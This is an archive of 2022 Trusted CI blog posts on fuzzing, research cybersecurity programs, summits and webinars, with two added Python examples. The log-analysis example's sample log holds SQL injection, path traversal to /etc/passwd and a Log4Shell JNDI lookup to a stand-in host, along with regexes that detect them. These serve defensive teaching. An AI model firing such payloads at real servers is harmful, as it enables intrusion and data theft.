Thursday, June 30, 2022

Trusted CI co-PI Bart Miller wins award for landmark paper on dependable computing

Bart Miller, Trusted CI co-PI, and his two student co-authors were honored with the 2022 Jean-Claude Laprie Award in Dependable Computing on June 28 in Baltimore, Md. Miller, along with Lars Fredriksen and Bryan So, was presented the award during the opening session of the Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN).

The groundbreaking paper, “An Empirical Study of the Reliability of UNIX Utilities,” published in 1990, launched the field of fuzz random testing, or fuzzing as it is commonly called. The paper introduced a new, easy-to-use software testing technique (feeding programs random input and watching for crashes and hangs) and then used that technique to evaluate the reliability of standard UNIX utilities. As part of this research, the authors also studied the root causes of the failures. They also released their code and data openly, a novelty at that time. The paper has been cited more than 1,300 times and was responsible for creating an entirely new branch of testing and security research. Hundreds of papers and dozens of PhD dissertations are produced each year in this area.
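As an added illustration of the technique the paper introduced (example code written for this page, not code from the paper, its authors, or Trusted CI), the following Python harness feeds random byte strings to a command's standard input, records runs that die by signal or exceed a timeout, and then greedily shrinks a crashing input, which is the first step toward the kind of root-cause analysis the authors performed. The target is a constructed toy script that aborts on any non-ASCII byte, standing in for a C utility that segfaults on unexpected input; point the same harness at a real utility by passing its argv instead.

```python
"""Minimal fuzz harness in the spirit of Miller, Fredriksen and So (added example).

Random bytes go to the target's stdin; a run that ends by signal counts as a
crash and a run that exceeds the timeout counts as a hang.  The target below
is a constructed stand-in, not a real UNIX utility.
"""
import random
import signal
import subprocess
import sys
import tempfile

# Constructed toy "utility": aborts (SIGABRT) when it sees a byte >= 0x80,
# standing in for a C program that crashes on input its author never expected.
TOY_UTILITY = """
import os, sys
data = sys.stdin.buffer.read()
if any(b > 0x7f for b in data):
    os.abort()
sys.stdout.write("ok %d\\n" % len(data))
"""


def toy_command():
    """Write the toy utility to a temp file and return the argv that runs it."""
    f = tempfile.NamedTemporaryFile("w", suffix=".py", delete=False)
    f.write(TOY_UTILITY)
    f.close()
    return [sys.executable, f.name]


def run_once(cmd, data, timeout=10.0):
    """Run cmd with data on stdin.

    Returns ("crash", signal name), ("hang", None) or ("ok", exit status).
    On POSIX, subprocess reports death by signal N as returncode -N.
    """
    try:
        proc = subprocess.run(cmd, input=data, capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return ("hang", None)
    if proc.returncode < 0:
        return ("crash", signal.Signals(-proc.returncode).name)
    return ("ok", proc.returncode)


def random_input(rng, max_len):
    """Purely random bytes of random length: the original 'fuzz' generator."""
    return bytes(rng.getrandbits(8) for _ in range(rng.randint(1, max_len)))


def fuzz(cmd, iterations=50, max_len=32, seed=1):
    """Drive the target with random inputs; return the list of failing cases.

    A fixed seed makes the campaign reproducible, which matters when you go
    back later to explain a crash.
    """
    rng = random.Random(seed)
    failures = []
    for i in range(iterations):
        data = random_input(rng, max_len)
        kind, detail = run_once(cmd, data)
        if kind != "ok":
            failures.append({"iteration": i, "kind": kind, "detail": detail, "input": data})
    return failures


def minimize(cmd, data):
    """Greedily delete single bytes while the crash still reproduces.

    Crude, but it usually isolates the triggering bytes well enough to start
    reading the target's code.
    """
    i = 0
    while i < len(data) and len(data) > 1:
        candidate = data[:i] + data[i + 1:]
        if run_once(cmd, candidate)[0] == "crash":
            data = candidate
        else:
            i += 1
    return data


if __name__ == "__main__":
    cmd = toy_command()
    for case in fuzz(cmd, iterations=20, seed=7):
        print(case["iteration"], case["kind"], case["detail"], case["input"].hex())
        if case["kind"] == "crash":
            print("  minimized:", minimize(cmd, case["input"]).hex())
```

Against the toy target almost every random input crashes, which is the point of a stand-in; against real utilities the interesting quantity is the fraction of inputs that crash or hang, and the minimized inputs are what you hand to whoever reads the source.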

Today, fuzzing is taught in introductory software testing and security courses, is a prominent area of focus at numerous conferences, and is recognized by major companies. For example, Microsoft recently published a paper on how they integrate fuzzing into the life cycle of almost all their products. Similarly, Google recently reported that 80 percent of the bugs they find in production in the Chrome web browser are found by fuzzing.

Fuzzing is heavily used in security research and is often the tool of choice for penetration testers. Thus, this paper has important implications for both reliability and security research.

About Bart Miller

Bart Miller with his Cessna TR182, which he bought in 1980. He has held his commercial pilot's license since 1979.

Barton Miller is the Vilas Distinguished Achievement Professor at the University of Wisconsin-Madison. He is a co-PI on Trusted CI, where he leads the software assurance effort. His research interests include software security, in-depth vulnerability assessment, and binary code analysis. In 1988, Miller founded the field of fuzz random software testing, a foundation of many security and software engineering disciplines. In 1992, Miller and his then-student Jeffrey Hollingsworth founded the field of dynamic binary code instrumentation and coined the term “dynamic instrumentation.” Miller is a Fellow of the ACM.

About the Jean-Claude Laprie Award in Dependable Computing

The award was created in 2011, in honor of Jean-Claude Laprie (1944-2010), whose pioneering contributions to the concepts and methodologies of dependability were influential in defining and unifying the field of dependable and secure computing. The award recognizes outstanding papers that have significantly influenced the theory and/or practice of dependable computing.

About IFIP WG 10.4 on Dependable Computing and Fault Tolerance

IFIP Working Group 10.4 was established in 1980 with the aim of identifying and integrating approaches, methods, and techniques for specifying, designing, building, assessing, validating, operating, and maintaining dependable computer systems (those that are reliable, available, safe, and secure). Its 75 members from around the world meet twice a year to conduct in-depth discussions of important technical topics to further the understanding of the fundamental concepts of dependable computing.

About the International Federation for Information Processing

IFIP is a non-governmental, non-profit umbrella organization for national societies working in the field of information processing. It was established in 1960 under the auspices of UNESCO as a result of the first World Computer Congress held in Paris in 1959. It is the leading multinational, apolitical organization in Information and Communications Technologies and Sciences.


Monday, June 27, 2022

Announcement of Trusted CI Director Transition

Dear Trusted CI community, friends, and partners,

After 10 years of directing Trusted CI, I am stepping down as Trusted CI Director today. I thank all of you for your support over the past decade - you have made my job both a huge privilege and a pleasure. I also extend my gratitude to NSF for providing this unique opportunity.

I’m excited to share that Jim Basney has agreed to accept the role of Trusted CI Director. Jim has served as Trusted CI’s Deputy Director for the past three years and has been part of its leadership team since its inception. I suspect most of you already know Jim and will join me in my optimism that Jim will serve as an excellent leader for Trusted CI’s second decade.

I thank Jim for his contributions as deputy, which I found invaluable, and I’m happy to also share that Jim will receive similar support from Sean Peisert, who has agreed to serve as Trusted CI Deputy Director going forward. Since Sean joined Trusted CI in 2019 he has made strong leadership contributions, including serving as a co-PI the last year and leading annual challenges and the OSCRP effort.

Kelli Shute will be staying on as Executive Director and has my thanks for her contributions in this role both past and into the future. Jim, Sean, and Kelli will be supported by the rest of the current leadership team: Kathy Benninger, Professor Bart Miller, and Mark Krenz.

I ask you to join me in congratulating Jim and Sean, and providing them and the rest of the team with the same support and collaboration going forward which you extended to me over the past decade. You can contact Jim and Sean directly at jbasney@illinois.edu and sppeisert@lbl.gov.

While my stepping down as Trusted CI Director is part of a larger life change I am making in that I will be leaving Indiana University at the end of the month, I will remain involved with Trusted CI to support this transition. 

Thank you, it has been an honor.

Von


Wednesday, June 22, 2022

Indiana University Center for Applied Cybersecurity Research releases an “Effective Cybersecurity for Research” Whitepaper

The tension between cybersecurity and research has kept institutional cybersecurity efforts for research confined to the most sensitive research, especially in academia. Evolving threats and new cybersecurity requirements scoped beyond individual awards are now slated to change the status quo. They point to a future where securing research holistically is no longer optional. Indiana University’s Center for Applied Cybersecurity Research released a paper this week outlining an approach to cybersecurity for research that shows great promise in breaking the prevailing security versus research impasse. It focuses exclusively on the researcher and the research mission, reduces the cybersecurity and compliance burden on the researcher, and secures not only research subject to rules and regulations, but all research. It is being embraced by researchers voluntarily and is accelerating research measurably.


The paper can be accessed by visiting this EDUCAUSE library page:  Effective Cybersecurity for Research


Tuesday, May 24, 2022

2022 NSF Cybersecurity Summit- Call for Participation is now open- Submission deadline June 10th

We are pleased to announce that the 2022 NSF Cybersecurity Summit is taking place the week of October 17th with the training and workshops occurring on Tuesday, October 18th, and plenary sessions occurring on Wednesday, October 19th, and Thursday, October 20th. 

The final program is still evolving, but we will maintain our mission of providing a format designed to increase the NSF community’s understanding of cybersecurity strategies that strengthen trustworthy science: what data, processes, and systems are crucial to the scientific mission, what risks they face, and how to protect them. 

Call for Participation (CFP)

Program content for the Summit is driven by our community. We invite proposals for plenary presentations & workshops. The deadline for CFP submissions is July 8th. To learn more about the CFP, please visit: www.trustedci.org/2022-summit-cfp

Student Program

 To support workforce development, the Summit organizers invite several students to attend the Summit at no cost every year. Both undergraduate and graduate students may apply, and no specific major or course of study is required, as long as the student is interested in learning and applying cybersecurity innovations to scientific endeavors. To learn more about the student program, visit our website: https://www.trustedci.org/summit2022/students

On behalf of the 2022 NSF Cybersecurity Summit organizers and program committee, we welcome your participation and hope to see you in October.

More information can be found at: https://www.trustedci.org/2022-cybersecurity-summit

 

Friday, May 13, 2022

Tuesday, May 10, 2022

Trusted CI Webinar: Ransomware: Threats & Mitigations, June 27th @11am Eastern

This event was originally scheduled to occur on May 23rd and has been rescheduled to June 27th.

REN-ISAC's Sarah Bigham and Krysten Stevens will be presenting the talk, Ransomware: Threats & Mitigations, on Monday June 27th at 11am (Eastern).

Please register here.

The education sector has unceremoniously emerged as the second most common target for ransomware. Ransomware continues to evolve, both in how it raises funds for criminal organizations and in how the technology works, keeping its victims guessing about defense and eradication. Institutions face the difficult challenge of preserving academic freedom, easy access to information, and open collaboration while defending against threat actors who exploit these same characteristics. This presentation will focus on the current threats and provide guidance on protecting against ransomware attacks.

Speaker Bios:

Sarah Bigham joined the REN-ISAC in March 2014. As Lead Security Analyst, her day-to-day responsibilities include managing the REN-ISAC Blended Threat Workshops, working closely with the National Council of ISACs (NCI), FBI, DHS, and other state and federal peers to stay abreast of new and emerging threats, as well as special projects and member relations. Before coming to the REN-ISAC, Sarah worked at Harvard University as a Systems Support Specialist focusing on campus-wide Identity & Access Management (IdM) and HIPAA compliance for Harvard University Health Services. Prior to that, Sarah was a defense contractor at the United States Naval Academy where she focused on user and desktop support across the Yard for all faculty, staff, and midshipmen. Sarah holds an Associate of Applied Science in Computer Network Management from Anne Arundel Community College (Annapolis, MD) and a Bachelor of Science in Information Systems Management from University of Maryland Global Campus.

Krysten Stevens joined REN-ISAC as Director of Technical Operations in 2020. She has a background in IT security analysis and cyber threat intelligence from Purdue University, where she used her leadership and expertise to train other security analysts, create security awareness programs, and develop threat intelligence strategies on an organizational level. Krysten graduated from Purdue University Global with an MS Cybersecurity Management in 2020, and she holds CISSP and GCTI certifications. When not at work, Krysten enjoys spending time with her husband, two children, five cats, and two golden retrievers (who refuse to retrieve).

---

Join Trusted CI's announcements mailing list for information about upcoming events. To submit topics or requests to present, see our call for presentations. Archived presentations are available on our site under "Past Events."

Thursday, May 5, 2022

Call for Trusted CI Framework Cohort Participation

 

The Framework Cohort is a six-month group engagement aimed at facilitating adoption and implementation of the Trusted CI Framework among NSF Major Facilities. During the engagement, members of the cohort will work closely with Trusted CI to adopt the Trusted CI Framework at their facility, emerging with a validated assessment of their cybersecurity program and a strategic plan detailing their path to fully implement each Framework Must. Cohort members will participate in six monthly workshops (each three hours) and spend no more than eight hours each month outside of the workshops on cohort assignments. The second cohort will meet from July to December 2022.

Since January 2022, Trusted CI has been working with six Major Facilities in the inaugural Framework cohort: GAGE, LIGO, NOIRLab, NRAO, NSO and OOI. As this inaugural Framework cohort approaches completion in June 2022, Trusted CI is looking for Major Facilities that are interested in participating in the upcoming second cohort.

NSF Major Facilities interested in participating in the Framework cohort should respond to the call by completing the form at the bottom of this page: https://www.trustedci.org/trusted-ci-framework-cohort-participation

If you have any questions, please contact us at info@trustedci.org.


2022 NSF Summit Student Program-Call For Application

Every year, Trusted CI organizes and hosts the NSF Cybersecurity Summit to bring together leaders in NSF cybersecurity and cyberinfrastructure. To support workforce development, the Summit organizers invite several students to attend the Summit at no cost every year. Both undergraduate and graduate students may apply; no specific major or course of study is required, as long as the student is interested in learning and applying cybersecurity innovations to scientific endeavors.

Students may either self-nominate or be nominated by a mentor or teacher.

To be considered, students must submit a one-page letter (800-word maximum) describing their interest in and any relevant experience with cybersecurity, emphasizing the benefit to the student and/or community of their attendance at the Summit.

This letter must include the student's name, contact information, the institution of higher education they attend, and their current expected year of graduation. A resume may be submitted in place of this information.

Up to fifteen successful student applicants will receive invitations to attend the Summit at no cost.

All applications will be reviewed by the Program Committee, which will select students with attention to advancing diversity and inclusiveness in the program.

The deadline for applications is August 1, 2022, with notification of acceptance to be sent by August 10, 2022.

Please discuss attendance with your instructors prior to attending.

 APPLY TO ATTEND SUMMIT (FORM)


For more information on the event itself, please visit: https://www.trustedci.org/2022-cybersecurity-summit

 Tips for Applying:

 The most successful applicants will...

  • Be prepared to actively engage and participate with the programming.
  • Make it known that they are interested in complex cybersecurity needs and in new, efficient, and effective ways to protect information assets while supporting science, even if they are new to the subject matter, and tell the program committee why they are interested in it; and
  • Relay at least 1-3 personal goals they would strive to meet while at the summit.

Highlighting these interests in the application will help the review committee understand why the student is well suited to attend the conference.

Send questions to students@trustedci.org

Monday, April 18, 2022

NSF Announces CICI Program Solicitation

NSF’s Office of Advanced Cyberinfrastructure recently announced solicitation 22-581 in the Cybersecurity Innovation for Cyberinfrastructure program. Proposals, due June 27, are solicited in three areas:

  • Usable and Collaborative Security for Science (UCSS)
  • Reference Scientific Security Datasets (RSSD)
  • Transition to Cyberinfrastructure Resilience (TCR)

NSF is hosting a webinar covering the objectives of the CICI program on April 27th at 2 PM Eastern. During the 90-minute webinar, Program Director Robert Beverly will discuss the program and answer questions. The presentation portion of the webinar will be recorded and posted on the CICI program website. Please register to attend.

As a reminder, you can find resources for including Trusted CI in your proposal on our website.

Tuesday, April 12, 2022

Trusted CI webinar: Updates from the Trusted CI Framework Cohort, April 25th @11am Eastern

Trusted CI's Scott Russell will be presenting the talk, Updates from the Trusted CI Framework Cohort, on Monday April 25th at 11am (Eastern).

Please register here.

The Trusted CI Framework is a minimum standard for cybersecurity programs. In response to cybersecurity guidance focused narrowly on cybersecurity controls, the Trusted CI Framework provides a more holistic and mission-focused standard for managing cybersecurity. In order to encourage adoption of the Trusted CI Framework, we have created a program called the Framework Cohort, where representatives from multiple NSF Major Facilities and other "Key Projects" participate in a group engagement with Trusted CI focused on adoption and implementation of the Framework.

This webinar will provide updates from the inaugural cohort, currently in progress, and discuss the opportunity to participate in future cohorts.

More information about the Framework can be found at https://www.trustedci.org/framework

Speaker Bio

Scott Russell is a Senior Policy Analyst at the Indiana University Center for Applied Cybersecurity Research. Scott was previously the Postdoctoral Fellow in Information Security Law & Policy. Scott’s work thus far has emphasized private sector cybersecurity best practices, data aggregation and the First and Fourth Amendments, and cybercrime in international law. Scott studied Computer Science and History at the University of Virginia and received his J.D. from the Indiana University, Maurer School of Law.

---

Join Trusted CI's announcements mailing list for information about upcoming events. To submit topics or requests to present, see our call for presentations. Archived presentations are available on our site under "Past Events."

Wednesday, April 6, 2022

SAVE THE DATE: Announcing the 2022 NSF Cybersecurity Summit, Oct 18-20 in Bloomington, Indiana

Please mark your calendars for the 2022 NSF Cybersecurity Summit planned for October 18-20 at the Monroe Convention Center, Bloomington, Indiana, near the Indiana University Campus.

Plenary sessions are scheduled to take place October 19th and 20th, while training and workshops will take place on the 18th.


Stay tuned for more information by following the Trusted CI Blog or our Announcement email list for more updates.


On behalf of Trusted CI


Monday, April 4, 2022

Trusted CI Fellows urge researchers to protect their data

Each year, Trusted CI selects a small number of community members to become Trusted CI Fellows. They make connections in the research cybersecurity community and receive training, knowledge, and skills from Trusted CI, which they can then take back into their local communities to advance the state of cybersecurity for research and serve as an ongoing Trusted CI liaison. Trusted CI also asks Fellows to produce a report to capture and share what they’ve learned and how it applies to their domain.

Trusted CI Fellows Deb McCaffrey and Michael Kyle have examined the security needs of higher education researchers in recently published reports. Having augmented their security knowledge from Trusted CI webinars and workshops, they advise researchers to take a systemic approach to protecting their data. 

In her Trusted CI report, Deb McCaffrey, a research computing facilitator at the University of Michigan, explores the security needs of basic and clinical research. She concludes that researchers need a better understanding of their security environments to protect their data.

Michael Kyle is a scientific applications consultant for the University of Delaware. In his Trusted CI report, he describes how researchers can manage their risks with the proper classification and protection of digital research data.

Trusted CI thanks Deb and Michael for these contributions and will highlight these and future Fellows reports in the Fellows section of the Trusted CI website.


Monday, March 28, 2022

Trusted CI Publishes 2022 Report Summarizing its Impact on Over 500 NSF Projects

Trusted CI has published its second Impacts Report analyzing our impact on the NSF community. The first report was published in 2018 and summarized our impact from 2012 to 2018. This new report updates our analysis under the current NSF cooperative agreement, which began in 2019 (award #1920430).

We define "impact" as the number of NSF projects (awards) that have had an engagement with Trusted CI or have had staff attend a Trusted CI event; including the NSF Cybersecurity Summit, webinars, and training events. Using that metric, we find that since 2012, Trusted CI has interacted with over 500 NSF projects, including over 300 NSF projects during the last 3 years (2019-2021).

The full report includes more details about our impact broken down by NSF Directorate, our engagements, Summit attendance, and more. It is available at https://doi.org/10.5281/zenodo.6350540.

Tuesday, March 22, 2022

White House Fact Sheet on cybersecurity protections

On March 21, the White House published “FACT SHEET: Act Now to Protect Against Potential Cyberattacks,” providing guidance on protection against potential Russian cyberattacks in response to sanctions. The White House post was covered by CNN, NBC News, Reuters, Bloomberg, and others.

The guidance in the Fact Sheet, specifically the Cybersecurity & Infrastructure Security Agency’s (CISA) Shields Up guidance, is well-established advice and in line with recommendations in Trusted CI’s Framework and software assurance guidance. Trusted CI encourages members of the NSF community who are considering or are in the process of implementing controls such as those mentioned in the Fact Sheet to have discussions among their leadership team about accelerating deployment of those protections at this time.

Trusted CI and OOI Complete Engagement

The Ocean Observatories Initiative (OOI, https://oceanobservatories.org/), funded by the NSF OCE Division of Ocean Sciences #1743430, is a science-driven ocean observing network that delivers real-time data from more than 800 instruments to address critical science questions regarding the world’s oceans. OOI data are freely available online to anyone with an Internet connection. 

The OOI provides an exponential increase in the scope and timescale of observations of the world’s oceans. Present and future educators, scientists, and researchers are able to draw conclusions about climatological and environmental processes based on these measurements, requiring the data to be accurate, with a flawless pedigree. As a result, the OOI has a requirement to protect its data from being altered by any external agent.


To this end, OOI-CI (OOI Cyberinfrastructure) solicited a consultation from Trusted CI to evaluate their current security program, along with guidance on reviewing and evaluating potential alternatives for an enhanced security posture. We refined and prioritized OOI’s needs to the following goals: (i) perform a security review of OOI’s cyberinfrastructure using the Trusted CI Security Program Evaluation worksheet, (ii) take steps toward adopting the Trusted CI Framework by developing a “master information security policies and procedures” document (MISPP), (iii) investigate and document missing policies and procedures, including questions and concerns raised by OOI, and unknowns discovered in above exercises, and (iv) provide guidance on creating an asset inventory, applying a control set, and creating and maintaining a risk registry.


The OOI team completed the Trusted CI Security Program Evaluation spreadsheet. This exercise started the OOI team thinking about and discussing cybersecurity concerns that were raised in the evaluation, both in previously known topics and in unknown or undefined areas. The Trusted CI team created a list of prioritized recommendations aligned with Framework Musts (core concepts that every cybersecurity program should have) that the OOI team can use in addressing or documenting gaps.


We introduced OOI to the Framework and Implementation Guide, and had discussions concerning the Musts, what they entail, and how they apply to and define a mature security program. The OOI team attended the 2021 NSF Cybersecurity Summit and specifically The Framework Workshop, where they were able to benefit from a deeper dive into the Framework and implementation guidance.


OOI displayed a solid grasp of the suggested security program solution, the Trusted CI Framework, and of what needs to be done to adopt it. Completely adopting the Framework was beyond the scope of this engagement; instead, OOI focused on (i) developing the top-level Master Information Security Policy & Procedures (MISPP) document, (ii) developing a Cybersecurity Strategic Plan, and (iii) developing supplemental security program policies, e.g., an Incident Response Plan, Disaster Recovery, and Acceptable Use Policies.


In addition to creating top-level policy documents, Trusted CI stressed the importance of having an up-to-date asset inventory as well as selecting and applying a baseline control set. The OOI team began identifying their critical assets, selected CIS Controls v8 as a control set, and then aimed to apply controls from Implementation Groups 1 and 2. Trusted CI staff also provided a list of ‘high priority’ controls to focus on that would provide the best return for the time and resources spent implementing them.


We are pleased to announce that OOI is a participant in Trusted CI’s Framework Cohort taking place the first half of 2022 (1H2022). This will allow them to continue their work on creating and refining a mature security program while working with other NSF Major Facilities under the guidance and expertise of Trusted CI’s Framework team. 


The engagement ran from August 16, 2021 to December 31, 2021, and was recorded in the document “OOI / Trusted CI Engagement Final Report” (https://hdl.handle.net/2022/27253).


Friday, March 11, 2022

Join Us at EDUCAUSE CPP Conference - Early Registration Ends 3/22

Trusted CI will be presenting at the 2022 EDUCAUSE Cybersecurity and Privacy Professionals Conference on May 3 - 5th in Baltimore, MD. The CPPC is “the premier forum for connecting with higher education information security and privacy professionals.” Early registration for this conference ends Tuesday, March 22nd. Trusted CI’s Ishan Abhinit, Kathy Benninger, and Mark Krenz will be participating in the sessions listed below. We are looking forward to seeing you at this exciting event!

Training: Security Log Analysis
Tuesday, May 03 | 8:30AM–12:00PM ET
Presenters: Ishan and Mark
The security log analysis workshop walks participants through the security log analysis life cycle, providing considerations for centralized log collection and log management tools, phases of compromise, and examples from real attacks. We will be analyzing logs from the Zeek Network Security Monitor, the Apache web server, two-factor authentication systems, cloud services, and others. This workshop also includes a hands-on exercise that demonstrates techniques for analyzing logs to detect security incidents using both the command line and the Elastic Stack (aka ELK). The hands-on exercise will provide an overview of investigation techniques for identifying the log evidence of common attacks such as SQL injection, filesystem traversal, brute force attacks, command injection, and more. Recent security vulnerabilities, such as Log4Shell, will also be discussed, along with techniques for detection. This will be an interactive session allowing Q&A and will also feature interactive polls to enhance participants' learning experience.
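As an added example of the kind of analysis the workshop covers (written for this page; it is not Trusted CI's workshop material), the following Python script parses Apache combined-format access log lines and flags four of the attack patterns named above: SQL injection and path traversal in the URL-decoded request path, the `${jndi:` lookup string that Log4Shell exploitation attempts carry in logged request headers, and password brute forcing seen as repeated 401 responses to a login endpoint from one address. The log lines are constructed, with addresses taken from documentation ranges; the signatures are deliberately simple starting points for an investigation and will miss obfuscated payloads.

```python
"""Pattern-based triage of Apache combined-format access logs (added example).

Sample lines below are constructed; addresses are from RFC 5737 documentation
ranges.  The signatures are starting points for an investigation, not a WAF.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SQLI_RE = re.compile(
    r"(?i)(\bunion\b.*\bselect\b|'\s*(or|and)\s*'|\bor\b\s+\d+\s*=\s*\d+|;\s*drop\b|--\s*$)"
)
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")
# Literal form only; nested ${lower:j}ndi style obfuscation is not covered here.
JNDI_RE = re.compile(r"(?i)\$\{\s*jndi\s*:")

SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2022:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2022:13:56:01 +0000] "GET /products?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 8841 "-" "curl/7.79.1"
198.51.100.23 - - [10/Mar/2022:13:56:09 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 221 "-" "curl/7.79.1"
198.51.100.9 - - [10/Mar/2022:13:57:12 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://198.51.100.9:1389/a}"
192.0.2.55 - - [10/Mar/2022:13:58:00 +0000] "POST /login HTTP/1.1" 401 0 "-" "python-requests/2.27"
192.0.2.55 - - [10/Mar/2022:13:58:01 +0000] "POST /login HTTP/1.1" 401 0 "-" "python-requests/2.27"
192.0.2.55 - - [10/Mar/2022:13:58:02 +0000] "POST /login HTTP/1.1" 401 0 "-" "python-requests/2.27"
192.0.2.55 - - [10/Mar/2022:13:58:03 +0000] "POST /login HTTP/1.1" 401 0 "-" "python-requests/2.27"
192.0.2.55 - - [10/Mar/2022:13:58:04 +0000] "POST /login HTTP/1.1" 401 0 "-" "python-requests/2.27"
192.0.2.55 - - [10/Mar/2022:13:58:05 +0000] "POST /login HTTP/1.1" 401 0 "-" "python-requests/2.27"
203.0.113.7 - - [10/Mar/2022:13:59:30 +0000] "POST /login HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""


def decode(s):
    """URL-decode twice so double-encoded payloads (%2527 -> %27 -> ') surface."""
    return unquote(unquote(s))


def parse(line):
    """Return a dict of fields, or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["decoded_path"] = decode(entry["path"])
    return entry


def classify(entry):
    """Tag one request with the attack signatures it matches."""
    tags = []
    path = entry["decoded_path"]
    if SQLI_RE.search(path):
        tags.append("sqli")
    if TRAVERSAL_RE.search(path):
        tags.append("traversal")
    # Log4Shell payloads usually ride in headers the application logs, such as User-Agent.
    for field in (path, entry["ua"], entry["referer"]):
        if JNDI_RE.search(decode(field)):
            tags.append("log4shell")
            break
    return tags


def brute_force(entries, login_path="/login", threshold=5):
    """IPs with at least `threshold` failed (401) POSTs to the login endpoint."""
    failures = Counter(
        e["ip"] for e in entries
        if e["method"] == "POST" and e["decoded_path"] == login_path and e["status"] == 401
    )
    return {ip: n for ip, n in failures.items() if n >= threshold}


def analyze(text):
    """Run all detectors over a log text; returns findings keyed by category."""
    lines = [l for l in text.splitlines() if l]
    parsed = [parse(l) for l in lines]
    entries = [e for e in parsed if e]
    findings = {"sqli": [], "traversal": [], "log4shell": []}
    for e in entries:
        for tag in classify(e):
            findings[tag].append({"ip": e["ip"], "ts": e["ts"], "path": e["decoded_path"], "ua": e["ua"]})
    findings["brute_force"] = brute_force(entries)
    findings["unparsed"] = parsed.count(None)   # lines worth a look by hand
    return findings


if __name__ == "__main__":
    for category, hits in analyze(SAMPLE_LOG).items():
        print(category, hits)
```

Decoding before matching is the detail that matters most in practice: the SQL injection and traversal lines above contain no literal quote or `../` until the percent-encoding is stripped, and a detector that matches raw request lines silently misses them. The `unparsed` count is kept on purpose, since lines that do not fit the expected format are often the interesting ones.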

Training: Security in the Shell (or, How I Learned to Think Before Forking)
Tuesday, May 03 | 1:00PM–4:30PM ET
Presenters: Ishan and Mark
Although it is one of the oldest technologies in IT, the command line and terminal emulators continue to be in wide use for modern IT needs. Although people may think of these technologies as having a solid security footing, there are a number of ways someone can shoot themselves in the foot while using them, and I'm not just talking about running "rm -fr /". In this workshop, Mark Krenz, the creator of the popular Twitter account climagic, will demonstrate these and guide students through how to practice better command line security, from understanding the metadata that is generated by your favorite editor to knowing how to exploit SSH, knowing how to protect yourself when checking malware, and much more. There is something for everyone in this workshop, and you are sure to come away with a plethora of job-saving tips.

Breakout session: Security Recommendations for Science DMZs
Wednesday, May 04 | 10:45AM–11:30AM ET
Presenters: Ishan, Kathy, and Mark
A Science DMZ is a special network architecture designed to improve the speed at which large science data transfers can be made. They have become a common solution to the issue of busy academic networks causing slowdowns or failures of large data transfers. A new paper published by Trusted CI on the security of Science DMZs provides an overview of this type of network architecture, summarizing the current best practice cybersecurity risk mitigations as well as providing additional security recommendations. This session is a brief introduction to the Science DMZ concept and presents an overview of the mitigations documented in the paper.

Wednesday, March 9, 2022

Trusted CI Applauds JASON Report on Facilities Cybersecurity

In 2021, the NSF "commissioned a study by the JASON advisory group to assess and make recommendations regarding cybersecurity at NSF’s major facilities.” In December, NSF publicly released the seven recommendations from the JASON group and NSF’s response to those recommendations. Given Trusted CI’s role over the past 10 years in providing leadership and guidance to NSF Major Facilities, we welcomed the opportunity to contribute to the JASON group’s study and the dialogue it spurred. The following text consists of each of the JASON group’s recommendations, followed by the response from NSF, and Trusted CI’s response, which is the unique contribution of this document. We provide our responses to help the community understand how Trusted CI can help them as they consider these recommendations and their impact within their own projects.

1. JASON recommendation: “NSF should maintain its current approach of supporting major facilities to enhance cybersecurity through assessments of risk, and development and implementation of mitigation plans. A prescriptive approach to cybersecurity should be avoided because it would be a poor fit to the diversity of facilities, would inefficiently use resources, and would not evolve quickly enough to keep up with changing threats.”

NSF response: “NSF intends to maintain its current philosophy of performing oversight of awardee plans that are tailored to the unique natures of the individual major facilities. Through its review processes, NSF will ensure that these plans are consistent with best practices for cybersecurity that are in common between major research facilities and other types of infrastructure.”

Trusted CI response: Trusted CI will continue helping the NSF community develop and improve their cybersecurity plans, which capture and prioritize best practices. Trusted CI will continue training and advising Major Facilities as they mature their cybersecurity programs and develop prioritized, mission-sensitive plans. We are available to support NSF reviews in any way that serves the community. We encourage expansion of NSF’s current approach and the inclusion of Trusted CI in the process of establishing generalized best practices for Major Facilities. We recommend those best practices align closely with, or equate to, the Trusted CI Framework. NSF also recently released a new version of the Research Infrastructure Guide (formerly the Major Facilities Guide). Section 6.3 (Guidelines for Cybersecurity of NSF’s Major Facilities) has been significantly updated to align with and refer to the Framework.

2. JASON recommendation: “An executive position for cybersecurity strategy and coordination for major facilities should be created at NSF. This executive should have authorities that allow them to continually support the balancing of cybersecurity, scientific progress, and cost in the distinct ways that will be appropriate for each facility.” 

NSF response: “NSF notes and agrees with the emphasis on such a position on strategy and coordination. NSF will explore different options for initiating the position and plans to create such a position within the next six months."

Trusted CI response: We strongly endorse this foundational recommendation and we look forward to collaborating with the new executive to fulfill our aligned missions. In Trusted CI’s experience, cybersecurity frequently proves ineffective or counterproductive when cybersecurity leadership lacks an understanding of the organization’s mission. An executive at NSF with expertise in both cybersecurity and the research mission would bring valuable additional perspective and leadership to NSF.

3. JASON recommendation: “Using annual reporting and review processes, NSF should ensure major facilities implement robust cybersecurity programs that remain consistent with current best practice.” 

NSF response: “NSF plans to review the elements of a good facility cybersecurity program, currently described in Section 6.3 of the NSF Major Facilities Guide, to ensure that this section is up to date. NSF will add cybersecurity as a required element of annual reports and program plans and conduct any additional specialized reviews based on perceived risk.”

